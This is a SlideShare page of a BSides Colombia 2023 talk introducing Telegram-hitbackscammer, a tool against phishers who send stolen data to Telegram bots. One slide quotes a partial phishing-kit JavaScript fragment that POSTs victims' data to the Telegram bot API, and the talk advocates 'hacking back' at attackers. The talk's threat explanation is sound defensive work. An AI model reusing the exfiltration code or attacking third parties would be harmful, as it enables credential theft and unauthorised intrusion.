SlideShare a Scribd company logo

Introducing Telegram-hitbackscammer | BSides Colombia 2023

J
Jaime Andrés Bello Vieda

Talk provided in the BSides Colombia 2023 - April 2023 Video: https://www.youtube.com/watch?v=YTz1yQGyFLw Project: https://github.com/avechuch0/telegram-hitbackscammer

Software
1 of 13
Download to read offline
Introducing Telegram-hitbackscammer A practical approach to fight and hack-back threat actors who use Telegram bots as exfiltration
03 Final product of this research as response to mitigate these issues Title Here Contents 01 The use of Telegram as part of the current threat landscape 02 How this research started
About me Just a guy with the goal of overcoming himself Threat Intel, Digital Forensics, Malware Analysis, CloudSec, Pentesting… These little things… GCFA, GCPN, CISM, CSX, PMP, IA-ISO27001 University Teacher – Researcher – Speaker Lover of nature, Musician IBMer, X-Force Incident Response ”
Phishing dear phishing…
So, what the fuss?
1. Weaponization 2. Delivery 3. Impact and monetization POST REQUEST … var settings = { "async": true, "crossDomain": true, "url": "https://api.telegram.org/bot" + telegram_bot_id + "/sendMessage", "method": "POST", … Attacker gets a Telegram bot using the Botfather for malicious purposes Victims fill data managed by malicious bot Credentials stolen for money transfer/ withdraw Phishing/Smishing So, what the fuss?
Researching and thinking Finally H3llo w0rld! What can I do to f*ck up these dudes? Logo hmm Hmm… Logo … Oh yes! Let’s code
A set of protocols to screw up the malicious activities of phishers who store the victim's stolen data on Telegram chats/channels ” Attribution Annoyance Attack So, what is Telegram-hitbackscammer
Cybersec theories behind Telegram-hitbackscammer Triple A of Active Defense Researchers Threat hunters Incident Responders Developers Attribution: Trying to unmask the attackers Annoyance: Wasting an attacker’s time Attack: It is hacking …back using pentest tricks
D.E.M.O ? Is there a Demo… Nope is not? https://github.com/avechuch0/telegram-hitbackscammer Of course, it is just kidding ☺
Closing thoughts Charity / Crowdfunding / Sponsorship The Telegram malicious current ecosystem is very huge to process! ”
Closing thoughts Be sure to hack… for good ALWAYS Spread the word, take it, and use it https://github.com/avechuch0/telegram-hitbackscammer QUESTIONS? @avechuch0 ” Jaime Andrés Bello Vieda
Thanks For Watching www. bsidesco. org April 2023 Colombia

Recommended

Internet Banking Attacks (Karel Miko)
Internet Banking Attacks (Karel Miko)Internet Banking Attacks (Karel Miko)
Internet Banking Attacks (Karel Miko)
DCIT, a.s.
 
IRJET- Security from Man-In-The-Middle-Attack
IRJET- Security from Man-In-The-Middle-AttackIRJET- Security from Man-In-The-Middle-Attack
IRJET- Security from Man-In-The-Middle-Attack
IRJET Journal
 
[Bucharest] Attack is easy, let's talk defence
[Bucharest] Attack is easy, let's talk defence[Bucharest] Attack is easy, let's talk defence
[Bucharest] Attack is easy, let's talk defence
OWASP EEE
 
The Comprehensive Security Policy In The Trojan War
The Comprehensive Security Policy In The Trojan WarThe Comprehensive Security Policy In The Trojan War
The Comprehensive Security Policy In The Trojan War
Mandy Cross
 
Needles, Haystacks and Algorithms: Using Machine Learning to detect complex t...
Needles, Haystacks and Algorithms: Using Machine Learning to detect complex t...Needles, Haystacks and Algorithms: Using Machine Learning to detect complex t...
Needles, Haystacks and Algorithms: Using Machine Learning to detect complex t...
DefCamp
 
Web Security
Web SecurityWeb Security
Web Security
Bharath Manoharan
 
Mim Attack Essay
Mim Attack EssayMim Attack Essay
Mim Attack Essay
Haley Johnson
 
Enhanced adaptive security system for SMS – based One Time Password
Enhanced adaptive security system for SMS – based One Time PasswordEnhanced adaptive security system for SMS – based One Time Password
Enhanced adaptive security system for SMS – based One Time Password
Chandrapriya Rediex
 

Recommended

Internet Banking Attacks (Karel Miko)
Internet Banking Attacks (Karel Miko)Internet Banking Attacks (Karel Miko)
Internet Banking Attacks (Karel Miko)
DCIT, a.s.
 
IRJET- Security from Man-In-The-Middle-Attack
IRJET- Security from Man-In-The-Middle-AttackIRJET- Security from Man-In-The-Middle-Attack
IRJET- Security from Man-In-The-Middle-Attack
IRJET Journal
 
[Bucharest] Attack is easy, let's talk defence
[Bucharest] Attack is easy, let's talk defence[Bucharest] Attack is easy, let's talk defence
[Bucharest] Attack is easy, let's talk defence
OWASP EEE
 
The Comprehensive Security Policy In The Trojan War
The Comprehensive Security Policy In The Trojan WarThe Comprehensive Security Policy In The Trojan War
The Comprehensive Security Policy In The Trojan War
Mandy Cross
 
Needles, Haystacks and Algorithms: Using Machine Learning to detect complex t...
Needles, Haystacks and Algorithms: Using Machine Learning to detect complex t...Needles, Haystacks and Algorithms: Using Machine Learning to detect complex t...
Needles, Haystacks and Algorithms: Using Machine Learning to detect complex t...
DefCamp
 
Web Security
Web SecurityWeb Security
Web Security
Bharath Manoharan
 
Mim Attack Essay
Mim Attack EssayMim Attack Essay
Mim Attack Essay
Haley Johnson
 
Enhanced adaptive security system for SMS – based One Time Password
Enhanced adaptive security system for SMS – based One Time PasswordEnhanced adaptive security system for SMS – based One Time Password
Enhanced adaptive security system for SMS – based One Time Password
Chandrapriya Rediex
 
miniproject.ppt.pptx
miniproject.ppt.pptxminiproject.ppt.pptx
miniproject.ppt.pptx
Anush90
 
Modeling and Utilizing Security Knowledge for Eliciting Security Requirements
Modeling and Utilizing Security Knowledge for Eliciting Security RequirementsModeling and Utilizing Security Knowledge for Eliciting Security Requirements
Modeling and Utilizing Security Knowledge for Eliciting Security Requirements
Shinpei Hayashi
 
Machine learning techniques in fraud prevention
Machine learning techniques in fraud preventionMachine learning techniques in fraud prevention
Machine learning techniques in fraud prevention
Volodymyr Syzonenko
 
Isn't it all just SMS-sending trojans?: Real Advances in Android Malware
Isn't it all just SMS-sending trojans?: Real Advances in Android MalwareIsn't it all just SMS-sending trojans?: Real Advances in Android Malware
Isn't it all just SMS-sending trojans?: Real Advances in Android Malware
Jimmy Shah
 
Threat report h1_2013
Threat report h1_2013Threat report h1_2013
Threat report h1_2013
Комсс Файквэе
 
Your Money or Your Data: Ransomware, Cyber Security and Today’s Threat Landsc...
Your Money or Your Data: Ransomware, Cyber Security and Today’s Threat Landsc...Your Money or Your Data: Ransomware, Cyber Security and Today’s Threat Landsc...
Your Money or Your Data: Ransomware, Cyber Security and Today’s Threat Landsc...
Roger Hagedorn
 
Ransomware_PDF
Ransomware_PDFRansomware_PDF
Ransomware_PDF
Ren Hao
 
Netpluz Managed SOC - MSS Service
Netpluz Managed SOC - MSS Service Netpluz Managed SOC - MSS Service
Netpluz Managed SOC - MSS Service
Netpluz Asia Pte Ltd
 
Email: still the favourite route of attack
Email: still the favourite route of attackEmail: still the favourite route of attack
Email: still the favourite route of attack
Claranet UK
 
Nuevas Tendencias de Negocios Virtuales en la Banca y sus Amenazas
Nuevas Tendencias de Negocios Virtuales en la Banca y sus AmenazasNuevas Tendencias de Negocios Virtuales en la Banca y sus Amenazas
Nuevas Tendencias de Negocios Virtuales en la Banca y sus Amenazas
Jaime Andrés Bello Vieda
 
Seguridad y auditoría de Apps o aplicaciones móviles
Seguridad y auditoría de Apps o aplicaciones móvilesSeguridad y auditoría de Apps o aplicaciones móviles
Seguridad y auditoría de Apps o aplicaciones móviles
Jaime Andrés Bello Vieda
 
Una mirada a la Active Defense Harbinger Distribution como herramienta de mon...
Una mirada a la Active Defense Harbinger Distribution como herramienta de mon...Una mirada a la Active Defense Harbinger Distribution como herramienta de mon...
Una mirada a la Active Defense Harbinger Distribution como herramienta de mon...
Jaime Andrés Bello Vieda
 
ISO 27001 cambios 2005 a 2013
ISO 27001 cambios 2005 a 2013ISO 27001 cambios 2005 a 2013
ISO 27001 cambios 2005 a 2013
Jaime Andrés Bello Vieda
 
Primera reunión Capitulo OWASP Bogota - Golismero
Primera reunión Capitulo OWASP Bogota - GolismeroPrimera reunión Capitulo OWASP Bogota - Golismero
Primera reunión Capitulo OWASP Bogota - Golismero
Jaime Andrés Bello Vieda
 
Entendiendo el ransomware
Entendiendo el ransomwareEntendiendo el ransomware
Entendiendo el ransomware
Jaime Andrés Bello Vieda
 
Construyendo tu propio laboratorio de pentesting
Construyendo tu propio laboratorio de pentestingConstruyendo tu propio laboratorio de pentesting
Construyendo tu propio laboratorio de pentesting
Jaime Andrés Bello Vieda
 
Introducción a la Gerencia de Proyectos del PMI
Introducción a la Gerencia de Proyectos del PMIIntroducción a la Gerencia de Proyectos del PMI
Introducción a la Gerencia de Proyectos del PMI
Jaime Andrés Bello Vieda
 
Hand Rolled Applicative User Validation Code Kata
Hand Rolled Applicative User Validation Code KataHand Rolled Applicative User Validation Code Kata
Hand Rolled Applicative User Validation Code Kata
Philip Schwarz
 
Measures in SQL (SIGMOD 2024, Santiago, Chile)
Measures in SQL (SIGMOD 2024, Santiago, Chile)Measures in SQL (SIGMOD 2024, Santiago, Chile)
Measures in SQL (SIGMOD 2024, Santiago, Chile)
Julian Hyde
 
ALGIT - Assembly Line for Green IT - Numbers, Data, Facts
ALGIT - Assembly Line for Green IT - Numbers, Data, FactsALGIT - Assembly Line for Green IT - Numbers, Data, Facts
ALGIT - Assembly Line for Green IT - Numbers, Data, Facts
Green Software Development
 
What next after learning python programming basics
What next after learning python programming basicsWhat next after learning python programming basics
What next after learning python programming basics
Rakesh Kumar R
 
2024 eCommerceDays Toulouse - Sylius 2.0.pdf
2024 eCommerceDays Toulouse - Sylius 2.0.pdf2024 eCommerceDays Toulouse - Sylius 2.0.pdf
2024 eCommerceDays Toulouse - Sylius 2.0.pdf
Łukasz Chruściel
 

More Related Content

Similar to Introducing Telegram-hitbackscammer | BSides Colombia 2023

miniproject.ppt.pptx
miniproject.ppt.pptxminiproject.ppt.pptx
miniproject.ppt.pptx
Anush90
 
Modeling and Utilizing Security Knowledge for Eliciting Security Requirements
Modeling and Utilizing Security Knowledge for Eliciting Security RequirementsModeling and Utilizing Security Knowledge for Eliciting Security Requirements
Modeling and Utilizing Security Knowledge for Eliciting Security Requirements
Shinpei Hayashi
 
Machine learning techniques in fraud prevention
Machine learning techniques in fraud preventionMachine learning techniques in fraud prevention
Machine learning techniques in fraud prevention
Volodymyr Syzonenko
 
Isn't it all just SMS-sending trojans?: Real Advances in Android Malware
Isn't it all just SMS-sending trojans?: Real Advances in Android MalwareIsn't it all just SMS-sending trojans?: Real Advances in Android Malware
Isn't it all just SMS-sending trojans?: Real Advances in Android Malware
Jimmy Shah
 
Threat report h1_2013
Threat report h1_2013Threat report h1_2013
Threat report h1_2013
Комсс Файквэе
 
Your Money or Your Data: Ransomware, Cyber Security and Today’s Threat Landsc...
Your Money or Your Data: Ransomware, Cyber Security and Today’s Threat Landsc...Your Money or Your Data: Ransomware, Cyber Security and Today’s Threat Landsc...
Your Money or Your Data: Ransomware, Cyber Security and Today’s Threat Landsc...
Roger Hagedorn
 
Ransomware_PDF
Ransomware_PDFRansomware_PDF
Ransomware_PDF
Ren Hao
 
Netpluz Managed SOC - MSS Service
Netpluz Managed SOC - MSS Service Netpluz Managed SOC - MSS Service
Netpluz Managed SOC - MSS Service
Netpluz Asia Pte Ltd
 
Email: still the favourite route of attack
Email: still the favourite route of attackEmail: still the favourite route of attack
Email: still the favourite route of attack
Claranet UK
 

Similar to Introducing Telegram-hitbackscammer | BSides Colombia 2023 (9)

miniproject.ppt.pptx
miniproject.ppt.pptxminiproject.ppt.pptx
miniproject.ppt.pptx
 
Modeling and Utilizing Security Knowledge for Eliciting Security Requirements
Modeling and Utilizing Security Knowledge for Eliciting Security RequirementsModeling and Utilizing Security Knowledge for Eliciting Security Requirements
Modeling and Utilizing Security Knowledge for Eliciting Security Requirements
 
Machine learning techniques in fraud prevention
Machine learning techniques in fraud preventionMachine learning techniques in fraud prevention
Machine learning techniques in fraud prevention
 
Isn't it all just SMS-sending trojans?: Real Advances in Android Malware
Isn't it all just SMS-sending trojans?: Real Advances in Android MalwareIsn't it all just SMS-sending trojans?: Real Advances in Android Malware
Isn't it all just SMS-sending trojans?: Real Advances in Android Malware
 
Threat report h1_2013
Threat report h1_2013Threat report h1_2013
Threat report h1_2013
 
Your Money or Your Data: Ransomware, Cyber Security and Today’s Threat Landsc...
Your Money or Your Data: Ransomware, Cyber Security and Today’s Threat Landsc...Your Money or Your Data: Ransomware, Cyber Security and Today’s Threat Landsc...
Your Money or Your Data: Ransomware, Cyber Security and Today’s Threat Landsc...
 
Ransomware_PDF
Ransomware_PDFRansomware_PDF
Ransomware_PDF
 
Netpluz Managed SOC - MSS Service
Netpluz Managed SOC - MSS Service Netpluz Managed SOC - MSS Service
Netpluz Managed SOC - MSS Service
 
Email: still the favourite route of attack
Email: still the favourite route of attackEmail: still the favourite route of attack
Email: still the favourite route of attack
 

More from Jaime Andrés Bello Vieda

Nuevas Tendencias de Negocios Virtuales en la Banca y sus Amenazas
Nuevas Tendencias de Negocios Virtuales en la Banca y sus AmenazasNuevas Tendencias de Negocios Virtuales en la Banca y sus Amenazas
Nuevas Tendencias de Negocios Virtuales en la Banca y sus Amenazas
Jaime Andrés Bello Vieda
 
Seguridad y auditoría de Apps o aplicaciones móviles
Seguridad y auditoría de Apps o aplicaciones móvilesSeguridad y auditoría de Apps o aplicaciones móviles
Seguridad y auditoría de Apps o aplicaciones móviles
Jaime Andrés Bello Vieda
 
Una mirada a la Active Defense Harbinger Distribution como herramienta de mon...
Una mirada a la Active Defense Harbinger Distribution como herramienta de mon...Una mirada a la Active Defense Harbinger Distribution como herramienta de mon...
Una mirada a la Active Defense Harbinger Distribution como herramienta de mon...
Jaime Andrés Bello Vieda
 
ISO 27001 cambios 2005 a 2013
ISO 27001 cambios 2005 a 2013ISO 27001 cambios 2005 a 2013
ISO 27001 cambios 2005 a 2013
Jaime Andrés Bello Vieda
 
Primera reunión Capitulo OWASP Bogota - Golismero
Primera reunión Capitulo OWASP Bogota - GolismeroPrimera reunión Capitulo OWASP Bogota - Golismero
Primera reunión Capitulo OWASP Bogota - Golismero
Jaime Andrés Bello Vieda
 
Entendiendo el ransomware
Entendiendo el ransomwareEntendiendo el ransomware
Entendiendo el ransomware
Jaime Andrés Bello Vieda
 
Construyendo tu propio laboratorio de pentesting
Construyendo tu propio laboratorio de pentestingConstruyendo tu propio laboratorio de pentesting
Construyendo tu propio laboratorio de pentesting
Jaime Andrés Bello Vieda
 
Introducción a la Gerencia de Proyectos del PMI
Introducción a la Gerencia de Proyectos del PMIIntroducción a la Gerencia de Proyectos del PMI
Introducción a la Gerencia de Proyectos del PMI
Jaime Andrés Bello Vieda
 

More from Jaime Andrés Bello Vieda (8)

Nuevas Tendencias de Negocios Virtuales en la Banca y sus Amenazas
Nuevas Tendencias de Negocios Virtuales en la Banca y sus AmenazasNuevas Tendencias de Negocios Virtuales en la Banca y sus Amenazas
Nuevas Tendencias de Negocios Virtuales en la Banca y sus Amenazas
 
Seguridad y auditoría de Apps o aplicaciones móviles
Seguridad y auditoría de Apps o aplicaciones móvilesSeguridad y auditoría de Apps o aplicaciones móviles
Seguridad y auditoría de Apps o aplicaciones móviles
 
Una mirada a la Active Defense Harbinger Distribution como herramienta de mon...
Una mirada a la Active Defense Harbinger Distribution como herramienta de mon...Una mirada a la Active Defense Harbinger Distribution como herramienta de mon...
Una mirada a la Active Defense Harbinger Distribution como herramienta de mon...
 
ISO 27001 cambios 2005 a 2013
ISO 27001 cambios 2005 a 2013ISO 27001 cambios 2005 a 2013
ISO 27001 cambios 2005 a 2013
 
Primera reunión Capitulo OWASP Bogota - Golismero
Primera reunión Capitulo OWASP Bogota - GolismeroPrimera reunión Capitulo OWASP Bogota - Golismero
Primera reunión Capitulo OWASP Bogota - Golismero
 
Entendiendo el ransomware
Entendiendo el ransomwareEntendiendo el ransomware
Entendiendo el ransomware
 
Construyendo tu propio laboratorio de pentesting
Construyendo tu propio laboratorio de pentestingConstruyendo tu propio laboratorio de pentesting
Construyendo tu propio laboratorio de pentesting
 
Introducción a la Gerencia de Proyectos del PMI
Introducción a la Gerencia de Proyectos del PMIIntroducción a la Gerencia de Proyectos del PMI
Introducción a la Gerencia de Proyectos del PMI
 

Recently uploaded

Hand Rolled Applicative User Validation Code Kata
Hand Rolled Applicative User Validation Code KataHand Rolled Applicative User Validation Code Kata
Hand Rolled Applicative User Validation Code Kata
Philip Schwarz
 
Measures in SQL (SIGMOD 2024, Santiago, Chile)
Measures in SQL (SIGMOD 2024, Santiago, Chile)Measures in SQL (SIGMOD 2024, Santiago, Chile)
Measures in SQL (SIGMOD 2024, Santiago, Chile)
Julian Hyde
 
ALGIT - Assembly Line for Green IT - Numbers, Data, Facts
ALGIT - Assembly Line for Green IT - Numbers, Data, FactsALGIT - Assembly Line for Green IT - Numbers, Data, Facts
ALGIT - Assembly Line for Green IT - Numbers, Data, Facts
Green Software Development
 
What next after learning python programming basics
What next after learning python programming basicsWhat next after learning python programming basics
What next after learning python programming basics
Rakesh Kumar R
 
2024 eCommerceDays Toulouse - Sylius 2.0.pdf
2024 eCommerceDays Toulouse - Sylius 2.0.pdf2024 eCommerceDays Toulouse - Sylius 2.0.pdf
2024 eCommerceDays Toulouse - Sylius 2.0.pdf
Łukasz Chruściel
 
KuberTENes Birthday Bash Guadalajara - Introducción a Argo CD
KuberTENes Birthday Bash Guadalajara - Introducción a Argo CDKuberTENes Birthday Bash Guadalajara - Introducción a Argo CD
KuberTENes Birthday Bash Guadalajara - Introducción a Argo CD
rodomar2
 
GreenCode-A-VSCode-Plugin--Dario-Jurisic
GreenCode-A-VSCode-Plugin--Dario-JurisicGreenCode-A-VSCode-Plugin--Dario-Jurisic
GreenCode-A-VSCode-Plugin--Dario-Jurisic
Green Software Development
 
WWDC 2024 Keynote Review: For CocoaCoders Austin
WWDC 2024 Keynote Review: For CocoaCoders AustinWWDC 2024 Keynote Review: For CocoaCoders Austin
WWDC 2024 Keynote Review: For CocoaCoders Austin
Patrick Weigel
 
Modelling Up - DDDEurope 2024 - Amsterdam
Modelling Up - DDDEurope 2024 - AmsterdamModelling Up - DDDEurope 2024 - Amsterdam
Modelling Up - DDDEurope 2024 - Amsterdam
Alberto Brandolini
 
Using Query Store in Azure PostgreSQL to Understand Query Performance
Using Query Store in Azure PostgreSQL to Understand Query PerformanceUsing Query Store in Azure PostgreSQL to Understand Query Performance
Using Query Store in Azure PostgreSQL to Understand Query Performance
Grant Fritchey
 
All you need to know about Spring Boot and GraalVM
All you need to know about Spring Boot and GraalVMAll you need to know about Spring Boot and GraalVM
All you need to know about Spring Boot and GraalVM
Alina Yurenko
 
Everything You Need to Know About X-Sign: The eSign Functionality of XfilesPr...
Everything You Need to Know About X-Sign: The eSign Functionality of XfilesPr...Everything You Need to Know About X-Sign: The eSign Functionality of XfilesPr...
Everything You Need to Know About X-Sign: The eSign Functionality of XfilesPr...
XfilesPro
 
How to write a program in any programming language
How to write a program in any programming languageHow to write a program in any programming language
How to write a program in any programming language
Rakesh Kumar R
 
SQL Accounting Software Brochure Malaysia
SQL Accounting Software Brochure MalaysiaSQL Accounting Software Brochure Malaysia
SQL Accounting Software Brochure Malaysia
GohKiangHock
 
一比一原版(UMN毕业证)明尼苏达大学毕业证如何办理
一比一原版(UMN毕业证)明尼苏达大学毕业证如何办理一比一原版(UMN毕业证)明尼苏达大学毕业证如何办理
一比一原版(UMN毕业证)明尼苏达大学毕业证如何办理
dakas1
 
Top Benefits of Using Salesforce Healthcare CRM for Patient Management.pdf
Top Benefits of Using Salesforce Healthcare CRM for Patient Management.pdfTop Benefits of Using Salesforce Healthcare CRM for Patient Management.pdf
Top Benefits of Using Salesforce Healthcare CRM for Patient Management.pdf
VALiNTRY360
 
UI5con 2024 - Boost Your Development Experience with UI5 Tooling Extensions
UI5con 2024 - Boost Your Development Experience with UI5 Tooling ExtensionsUI5con 2024 - Boost Your Development Experience with UI5 Tooling Extensions
UI5con 2024 - Boost Your Development Experience with UI5 Tooling Extensions
Peter Muessig
 
socradar-q1-2024-aviation-industry-report.pdf
socradar-q1-2024-aviation-industry-report.pdfsocradar-q1-2024-aviation-industry-report.pdf
socradar-q1-2024-aviation-industry-report.pdf
SOCRadar
 
Mobile App Development Company In Noida | Drona Infotech
Mobile App Development Company In Noida | Drona InfotechMobile App Development Company In Noida | Drona Infotech
Mobile App Development Company In Noida | Drona Infotech
Drona Infotech
 
Microservice Teams - How the cloud changes the way we work
Microservice Teams - How the cloud changes the way we workMicroservice Teams - How the cloud changes the way we work
Microservice Teams - How the cloud changes the way we work
Sven Peters
 

Recently uploaded (20)

Hand Rolled Applicative User Validation Code Kata
Hand Rolled Applicative User Validation Code KataHand Rolled Applicative User Validation Code Kata
Hand Rolled Applicative User Validation Code Kata
 
Measures in SQL (SIGMOD 2024, Santiago, Chile)
Measures in SQL (SIGMOD 2024, Santiago, Chile)Measures in SQL (SIGMOD 2024, Santiago, Chile)
Measures in SQL (SIGMOD 2024, Santiago, Chile)
 
ALGIT - Assembly Line for Green IT - Numbers, Data, Facts
ALGIT - Assembly Line for Green IT - Numbers, Data, FactsALGIT - Assembly Line for Green IT - Numbers, Data, Facts
ALGIT - Assembly Line for Green IT - Numbers, Data, Facts
 
What next after learning python programming basics
What next after learning python programming basicsWhat next after learning python programming basics
What next after learning python programming basics
 
2024 eCommerceDays Toulouse - Sylius 2.0.pdf
2024 eCommerceDays Toulouse - Sylius 2.0.pdf2024 eCommerceDays Toulouse - Sylius 2.0.pdf
2024 eCommerceDays Toulouse - Sylius 2.0.pdf
 
KuberTENes Birthday Bash Guadalajara - Introducción a Argo CD
KuberTENes Birthday Bash Guadalajara - Introducción a Argo CDKuberTENes Birthday Bash Guadalajara - Introducción a Argo CD
KuberTENes Birthday Bash Guadalajara - Introducción a Argo CD
 
GreenCode-A-VSCode-Plugin--Dario-Jurisic
GreenCode-A-VSCode-Plugin--Dario-JurisicGreenCode-A-VSCode-Plugin--Dario-Jurisic
GreenCode-A-VSCode-Plugin--Dario-Jurisic
 
WWDC 2024 Keynote Review: For CocoaCoders Austin
WWDC 2024 Keynote Review: For CocoaCoders AustinWWDC 2024 Keynote Review: For CocoaCoders Austin
WWDC 2024 Keynote Review: For CocoaCoders Austin
 
Modelling Up - DDDEurope 2024 - Amsterdam
Modelling Up - DDDEurope 2024 - AmsterdamModelling Up - DDDEurope 2024 - Amsterdam
Modelling Up - DDDEurope 2024 - Amsterdam
 
Using Query Store in Azure PostgreSQL to Understand Query Performance
Using Query Store in Azure PostgreSQL to Understand Query PerformanceUsing Query Store in Azure PostgreSQL to Understand Query Performance
Using Query Store in Azure PostgreSQL to Understand Query Performance
 
All you need to know about Spring Boot and GraalVM
All you need to know about Spring Boot and GraalVMAll you need to know about Spring Boot and GraalVM
All you need to know about Spring Boot and GraalVM
 
Everything You Need to Know About X-Sign: The eSign Functionality of XfilesPr...
Everything You Need to Know About X-Sign: The eSign Functionality of XfilesPr...Everything You Need to Know About X-Sign: The eSign Functionality of XfilesPr...
Everything You Need to Know About X-Sign: The eSign Functionality of XfilesPr...
 
How to write a program in any programming language
How to write a program in any programming languageHow to write a program in any programming language
How to write a program in any programming language
 
SQL Accounting Software Brochure Malaysia
SQL Accounting Software Brochure MalaysiaSQL Accounting Software Brochure Malaysia
SQL Accounting Software Brochure Malaysia
 
一比一原版(UMN毕业证)明尼苏达大学毕业证如何办理
一比一原版(UMN毕业证)明尼苏达大学毕业证如何办理一比一原版(UMN毕业证)明尼苏达大学毕业证如何办理
一比一原版(UMN毕业证)明尼苏达大学毕业证如何办理
 
Top Benefits of Using Salesforce Healthcare CRM for Patient Management.pdf
Top Benefits of Using Salesforce Healthcare CRM for Patient Management.pdfTop Benefits of Using Salesforce Healthcare CRM for Patient Management.pdf
Top Benefits of Using Salesforce Healthcare CRM for Patient Management.pdf
 
UI5con 2024 - Boost Your Development Experience with UI5 Tooling Extensions
UI5con 2024 - Boost Your Development Experience with UI5 Tooling ExtensionsUI5con 2024 - Boost Your Development Experience with UI5 Tooling Extensions
UI5con 2024 - Boost Your Development Experience with UI5 Tooling Extensions
 
socradar-q1-2024-aviation-industry-report.pdf
socradar-q1-2024-aviation-industry-report.pdfsocradar-q1-2024-aviation-industry-report.pdf
socradar-q1-2024-aviation-industry-report.pdf
 
Mobile App Development Company In Noida | Drona Infotech
Mobile App Development Company In Noida | Drona InfotechMobile App Development Company In Noida | Drona Infotech
Mobile App Development Company In Noida | Drona Infotech
 
Microservice Teams - How the cloud changes the way we work
Microservice Teams - How the cloud changes the way we workMicroservice Teams - How the cloud changes the way we work
Microservice Teams - How the cloud changes the way we work
 

Introducing Telegram-hitbackscammer | BSides Colombia 2023

  • 1. Introducing Telegram-hitbackscammer A practical approach to fight and hack-back threat actors who use Telegram bots as exfiltration
  • 2. 03 Final product of this research as response to mitigate these issues Title Here Contents 01 The use of Telegram as part of the current threat landscape 02 How this research started
  • 3. About me Just a guy with the goal of overcoming himself Threat Intel, Digital Forensics, Malware Analysis, CloudSec, Pentesting… These little things… GCFA, GCPN, CISM, CSX, PMP, IA-ISO27001 University Teacher – Researcher – Speaker Lover of nature, Musician IBMer, X-Force Incident Response ”
  • 5. So, what the fuss?
  • 6. 1. Weaponization 2. Delivery 3. Impact and monetization POST REQUEST … var settings = { "async": true, "crossDomain": true, "url": "https://api.telegram.org/bot" + telegram_bot_id + "/sendMessage", "method": "POST", … Attacker gets a Telegram bot using the Botfather for malicious purposes Victims fill data managed by malicious bot Credentials stolen for money transfer/ withdraw Phishing/Smishing So, what the fuss?
  • 7. Researching and thinking Finally H3llo w0rld! What can I do to f*ck up these dudes? Logo hmm Hmm… Logo … Oh yes! Let’s code
  • 8. A set of protocols to screw up the malicious activities of phishers who store the victim's stolen data on Telegram chats/channels ” Attribution Annoyance Attack So, what is Telegram-hitbackscammer
  • 9. Cybersec theories behind Telegram-hitbackscammer Triple A of Active Defense Researchers Threat hunters Incident Responders Developers Attribution: Trying to unmask the attackers Annoyance: Wasting an attacker’s time Attack: It is hacking …back using pentest tricks
  • 10. D.E.M.O ? Is there a Demo… Nope is not? https://github.com/avechuch0/telegram-hitbackscammer Of course, it is just kidding ☺
  • 11. Closing thoughts Charity / Crowdfunding / Sponsorship The Telegram malicious current ecosystem is very huge to process! ”
  • 12. Closing thoughts Be sure to hack… for good ALWAYS Spread the word, take it, and use it https://github.com/avechuch0/telegram-hitbackscammer QUESTIONS? @avechuch0 ” Jaime Andrés Bello Vieda
  • 13. Thanks For Watching www. bsidesco. org April 2023 Colombia